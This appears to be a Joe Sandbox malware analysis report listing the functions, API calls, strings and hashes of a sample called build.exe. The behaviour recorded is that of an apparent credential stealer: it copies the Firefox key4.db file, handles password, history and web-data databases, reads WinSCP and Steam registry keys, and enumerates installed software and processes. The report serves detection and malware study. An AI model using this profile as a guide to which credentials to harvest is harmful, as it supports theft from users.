Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CopyFile
String ID: C:\ProgramData\$\key4.db$lTD$lTD$'E
API String ID: 1304948518-2578410745
Opcode ID: 8d79dbb0ad1e7ac8fa06e4d058e647d1ef10b1d8f58137d4c59b0f9ceb188360
Instruction ID: 6ad7053288e18fb2becd3ba35519820a6c95b5cb6f0518f62bf394652a1526bb
Opcode Fuzzy Hash: 8d79dbb0ad1e7ac8fa06e4d058e647d1ef10b1d8f58137d4c59b0f9ceb188360
Instruction Fuzzy Hash: 79517EB67401149FC704CB9CDDC1FAD33BAEFC9604B084428E406E7356DA78AE25CB9A

Function 00414223 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0041423F
memset.MSVCRT ref: 00414258
memset.MSVCRT ref: 00414269
memset.MSVCRT ref: 0041427A
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 004142C2

Strings

Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 004142A2, 004142A8, 004142BC

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memset$Open
String ID: Software\Martin Prikryl\WinSCP 2\Configuration
API String ID: 276825008-2822339690
Opcode ID: 875ea9aeca57663236e07e7b8b738bcf569ddb3b5275693e73b7244f09e5574d
Instruction ID: a4149cbd55dcf9ec5f86b160d7cd1004748f282e2d089feb1e299a34521fe547
Opcode Fuzzy Hash: 875ea9aeca57663236e07e7b8b738bcf569ddb3b5275693e73b7244f09e5574d
Instruction Fuzzy Hash: 9B11B2B2C511246BD720DBA6DC8DD9B3B7CEB8A310F04407EB519DB240E6B59914CBE5

Function 0042C6C8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0042C7A4

Strings

C:\ProgramData\, xrefs: 0042C72C, 0042C732, 0042C747
lTD, xrefs: 0042C7D5
lTD, xrefs: 0042C710

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateDirectory
String ID: C:\ProgramData\$lTD$lTD
API String ID: 4241100979-3701453751
Opcode ID: fd0e82dec119dba322a7c6096ded51b902f46ea9c2b987c5c6cec87d8c7672a0
Instruction ID: 31c80a94cef3e32279e2b3b95fdfaa81a2b1e18fb5af080639bf195b1bb07545
Opcode Fuzzy Hash: fd0e82dec119dba322a7c6096ded51b902f46ea9c2b987c5c6cec87d8c7672a0
Instruction Fuzzy Hash: AA515FB5F001108FDB14DF6DDC81AAA77F6EFC9304B088479A81AD7351DA34EA59CB98

Function 0040DDC3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 127
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040DEE9

Strings

'E, xrefs: 0040DE32
C:\ProgramData\, xrefs: 0040DDEB, 0040DDF1, 0040DE03
$|X, xrefs: 0040DF31

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CopyFile
String ID: $|X$C:\ProgramData\$'E
API String ID: 1304948518-2551353523
Opcode ID: b8ece8a38ac88d1a9e8b8c62dba14a6124fe639d5abe7aed50bc7201f7af8475
Instruction ID: 210b412480b9b1f6e40c5c6a5c6a986acd163ec9f824bb5448706ba36133746a
Opcode Fuzzy Hash: b8ece8a38ac88d1a9e8b8c62dba14a6124fe639d5abe7aed50bc7201f7af8475
Instruction Fuzzy Hash: 5D4197BAB421109FD714DB6CDC81BDD73F5AF8A304B094565E806D3321DB74AE24CB99

Function 0040CB8C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040CBB0
RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040CCB4
DeleteFileA.KERNEL32(00000000), ref: 0040CCCD

Strings

_passwords.db, xrefs: 0040CC24, 0040CC2A, 0040CC37

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Heap$AllocateDeleteFileFree
String ID: _passwords.db
API String ID: 2485951164-1485422284
Opcode ID: a7043d1debc52e48b3003d44f97e9eac390a076a658ce9e3e3632af536d91c4e
Instruction ID: b37c3980acad7b287a63fd84c6568bc53c6d2d1415935e73d4ad3cc0f33b3f93
Opcode Fuzzy Hash: a7043d1debc52e48b3003d44f97e9eac390a076a658ce9e3e3632af536d91c4e
Instruction Fuzzy Hash: 85414EB66401159BD704EB6CEC95E6E77F9FFCA7047084428E419D3311CA34AA26CB9E

Function 0040E0C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040E1F0

Strings

$|X, xrefs: 0040E20B
'E, xrefs: 0040E13C
C:\ProgramData\, xrefs: 0040E0F5, 0040E0FB, 0040E10D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CopyFile
String ID: $|X$C:\ProgramData\$'E
API String ID: 1304948518-2551353523
Opcode ID: 90415b50240b5b3216ec83fa10819a54488d92d7aab5751acc4f0ee742999494
Instruction ID: a0ca7a678a9fc7aef83b92d14bb0b022872ceb26902699c26760bdc125b8b43a
Opcode Fuzzy Hash: 90415b50240b5b3216ec83fa10819a54488d92d7aab5751acc4f0ee742999494
Instruction Fuzzy Hash: 1C415EB67420109BDB05CB9CDCD1FDD77B5BF8A304B094839E40AE3361DA74AE298B59

Function 0040ED79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040EE9B

Strings

C:\ProgramData\, xrefs: 0040EDA1, 0040EDA6, 0040EDB5
'E, xrefs: 0040EDE6

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CopyFile
String ID: C:\ProgramData\$'E
API String ID: 1304948518-2523843158
Opcode ID: 2882e95cde3e227961071db3bf314aefc9e93a392954357e6cde62046eb5ef51
Instruction ID: fa38410b2714a6e77a67ab8d0ac84656252ce63968c3431b5881fbac74b51b6b
Opcode Fuzzy Hash: 2882e95cde3e227961071db3bf314aefc9e93a392954357e6cde62046eb5ef51
Instruction Fuzzy Hash: 64417B76B400049FCB04DF9CDD81BAD77B5BF89214B084038E41AE3352DA34AE29CB9A

Function 0040E26E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000), ref: 0040E382

Strings

_history.db, xrefs: 0040E2EB, 0040E2F1, 0040E301, 0040E306
$|X, xrefs: 0040E3A9

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: DeleteFile
String ID: $|X$_history.db
API String ID: 4033686569-3470021098
Opcode ID: a307596c9b0dbdd293c27af80e64e3424aa25886e0e5d8551a5afdc3c504056d
Instruction ID: de087bb8a02b9b5954df5ad64bbb9d21ead85b46a7a89c4a5d4623f81effc206
Opcode Fuzzy Hash: a307596c9b0dbdd293c27af80e64e3424aa25886e0e5d8551a5afdc3c504056d
Instruction Fuzzy Hash: 404163BAA411049FCB05CFA8DC81AEDB7F1FF89304B048429E815D3315DB78AA15CF59

Function 0040DF3F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000), ref: 0040E049

Strings

$|X, xrefs: 0040E070
_webdata.db, xrefs: 0040DFB6, 0040DFBC, 0040DFCC

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: DeleteFile
String ID: $|X$_webdata.db
API String ID: 4033686569-158154304
Opcode ID: b2a32d48ddfb3c47622254f12c8ef012da89dcf3320ef21effe23d5c0090a455
Instruction ID: 7ce97649fd713c523dbf5e134aa6649b44230df0f9e0713be51a9fe393079403
Opcode Fuzzy Hash: b2a32d48ddfb3c47622254f12c8ef012da89dcf3320ef21effe23d5c0090a455
Instruction Fuzzy Hash: 4D4183BAA411149FCB04CFACDC81ADDB7F5BF89300B098415E815E7325DB78AA15CF99

Function 004077B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(?,GET,?,HTTP/1.1,00000000,00000000,?,00000000), ref: 00407822

Strings

GET, xrefs: 004077DE, 004077E4, 0040781B, 00407820
HTTP/1.1, xrefs: 004077FC, 00407802, 00407817

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: HttpOpenRequest
String ID: GET$HTTP/1.1
API String ID: 1984915467-4061949999
Opcode ID: 217fecd13b2460af1abae7b9b74faf3b90c66457f266eb17740facb1646511b5
Instruction ID: 88c5459bb71fff4a7f8c34efe04472a59221c94ba1fcd3e659fa59ec531c01e0
Opcode Fuzzy Hash: 217fecd13b2460af1abae7b9b74faf3b90c66457f266eb17740facb1646511b5
Instruction Fuzzy Hash: A201D4B87102059FDB08CF54DDC2E6B37AAFB9A305B04412DE402D3311E6B4BD14D799

Function 0041FEC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041FF42

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041FEF9, 0041FEFF, 0041FF1B
%s\%s, xrefs: 0041FEDB, 0041FEE1, 0041FF1C, 0041FF21

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Open
String ID: %s\%s$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 71445658-1969869098
Opcode ID: c6c32dde087a60be459981c5a25d9cdae22c500a76205aa6044837812575c95c
Instruction ID: d72de999b2892b00457b4301201e501fe1f29f5046f65ed3e118f347551177f9
Opcode Fuzzy Hash: c6c32dde087a60be459981c5a25d9cdae22c500a76205aa6044837812575c95c
Instruction Fuzzy Hash: 6C01D8B96002015FD324DF58DC91E6777E9FB85304F04002DE946D3262EA74A9088B65

Function 004077BF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(?,GET,?,HTTP/1.1,00000000,00000000,?,00000000), ref: 00407822

Strings

GET, xrefs: 004077DE, 004077E4, 0040781B, 00407820
HTTP/1.1, xrefs: 004077FC, 00407802, 00407817

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: HttpOpenRequest
String ID: GET$HTTP/1.1
API String ID: 1984915467-4061949999
Opcode ID: c26e72baf244679ae1380ab36c354a9d5c12ff323c7b3e85c0b6eb28420587d3
Instruction ID: 5a2855c5d477d9864c51e49c90507d96aaf2b89e3308fb2ad7f604e3a9f164b8
Opcode Fuzzy Hash: c26e72baf244679ae1380ab36c354a9d5c12ff323c7b3e85c0b6eb28420587d3
Instruction Fuzzy Hash: D60184B87102059FDB08CF54DD82E6B77AAFB9A305B044129E501D7311E7B5BD14C799

Function 004295FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042961E
RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 00429660

Strings

Software\Valve\Steam, xrefs: 0042963D, 00429643, 0042965A

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Openmemset
String ID: Software\Valve\Steam
API String ID: 180050240-490694136
Opcode ID: a59053157d78675f8bf7816a6b86b3a91a7600940e0728385377ffd210f69d38
Instruction ID: a33e435cb44d62256079c35c96f443ad56b4672447584121e235a2f7f769d0df
Opcode Fuzzy Hash: a59053157d78675f8bf7816a6b86b3a91a7600940e0728385377ffd210f69d38
Instruction Fuzzy Hash: A3F0C8B6A402056BD314DB99DC86DBB3678EB95300F04413CB90997341E6649E14C7A5

Function 0041FDC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041FE30

Strings

?, xrefs: 0041FDF2
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041FE0F, 0041FE15, 0041FE28

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Open
String ID: ?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 71445658-2633480413
Opcode ID: d320a3521d35f168751300790cb266167562fdbf6311ac38afecd85639501f0b
Instruction ID: c8f2481e82a16eca426fec0ccf16404ca92c35e872ef3ce0eab83674d6df9e99
Opcode Fuzzy Hash: d320a3521d35f168751300790cb266167562fdbf6311ac38afecd85639501f0b
Instruction Fuzzy Hash: 7001D6B5A00204AFD3249F19EC94E2BBBE8FFC5345F05851EE84687391DA749804CB55

Function 00420420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042043C
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119), ref: 0042047D

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0042045B, 00420461, 00420477

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Openmemset
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 180050240-1514646153
Opcode ID: 2ad32eb8251b01e98074a0d0486dcfb936fe310c63f78620c8fe9f07967d2f10
Instruction ID: 704948cce47b6def0a0afe579a61564877315a8cc2ef23d99e61b0d3b5485971
Opcode Fuzzy Hash: 2ad32eb8251b01e98074a0d0486dcfb936fe310c63f78620c8fe9f07967d2f10
Instruction Fuzzy Hash: E1F0F6766412116BD214DB6ADC4AD2B7A6CFBC7314F05813CF818C7302D674A914C766

Function 004235EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00423615
Process32First.KERNEL32(00000000), ref: 00423622

Strings

5$#w, xrefs: 00423605

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID: 5$#w
API String ID: 2353314856-2839390797
Opcode ID: bae8fede1a8106b78921d416f13b3c645951278458bb2964471e672d63109a45
Instruction ID: 5be2964b6b9545829f7e644963e2359ac3e23bc5df8f00164b782a01543cc960
Opcode Fuzzy Hash: bae8fede1a8106b78921d416f13b3c645951278458bb2964471e672d63109a45
Instruction Fuzzy Hash: A7F06DB5342215AFE7A0DB1DED85F6673E8EBCA304F550438AA04C7382DA74DD208765

Function 004232FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042331D
Process32First.KERNEL32(00000000), ref: 0042332A

Strings

N-`, xrefs: 0042330D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID: N-`
API String ID: 2353314856-3407581833
Opcode ID: eace18cfdea52badcbf0b24e5d0a25599bcf84b3f0cedbea6f9fb6112a0eaf8b
Instruction ID: bfc0c55214930d693d6a9e4c20c5a6b406b452c8cd58e231ce84683c647d9d8e
Opcode Fuzzy Hash: eace18cfdea52badcbf0b24e5d0a25599bcf84b3f0cedbea6f9fb6112a0eaf8b
Instruction Fuzzy Hash: 2EE012753021556BD750DF6EDC86F5B36ACAF86348F094038B504DB3D2DA609C288755

Function 00421C6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Gdiplus.dll), ref: 00421C7F

Strings

Gdiplus.dll, xrefs: 00421C7A
3}*X, xrefs: 00421C6F

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: LibraryLoad
String ID: 3}*X$Gdiplus.dll
API String ID: 1029625771-3385796832
Opcode ID: 83f535675c73549619932c820c058beef8f2ba26ac9fe6155ac65687aab25696
Instruction ID: 3fe45f8394e78795334f831f8f6b676fc398847a8e65ceccf9ffb3b8370cb1d8
Opcode Fuzzy Hash: 83f535675c73549619932c820c058beef8f2ba26ac9fe6155ac65687aab25696
Instruction Fuzzy Hash: C0E08C3930060ADFC704DF65C894E1873A2FB9D30431580B9C8428B322E77AA80ACB88

Function 004236F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000000), ref: 004236FE

Strings

5$#w, xrefs: 00423700
5$#w, xrefs: 004236F0

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: ProcessTerminate
String ID: 5$#w$5$#w
API String ID: 560597551-2883133298
Opcode ID: 882f83642efd418665423add51b5c1a36d27814765caa829c4ac35b1579d154f
Instruction ID: 7c70d1fc7905766f050714cb572277ef9d259369ec2c40e01a949b1e957500cb
Opcode Fuzzy Hash: 882f83642efd418665423add51b5c1a36d27814765caa829c4ac35b1579d154f
Instruction Fuzzy Hash: 1BC04CE76450007BE1629BD9ED82B3B23A4679EA80FA80415B321C26D0D618D6115A1A

